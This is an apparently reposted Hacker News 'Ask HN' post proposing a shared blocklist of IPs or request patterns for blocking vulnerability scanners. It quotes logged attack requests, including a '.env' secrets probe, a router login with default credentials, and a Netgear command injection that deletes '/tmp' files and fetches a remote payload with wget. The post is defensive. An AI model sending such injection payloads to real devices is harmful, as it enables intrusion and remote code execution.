New top story on Hacker News: Ask HN: Can we collaborate on a IP Address or Regex blacklist?

Ask HN: Can we collaborate on a IP Address or Regex blacklist?
9 by usernamebias | 14 comments on Hacker News.
Hear me out. I've recently started logging pings to my services, A LOT of servers ping me constantly checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this. { "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "125.47.68.164" }, { "offense": ".env", "ipAddress": "52.224.55.198" }, { "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+https://ift.tt/3wziuvW", "ipAddress": "115.58.115.18" } Maybe we don't filter by ip address, and instead filter requests based on known strings (or regex). That's what i'm currently doing. Ex. If request includes '.env'. Blocked! I'd love to implement a more aggressive strategy. Rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'. Like a 'ad blocklist' we can use as middleware in our HTTP applications. If something exists already, kindly point me to a Github.

No comments:

Post a Comment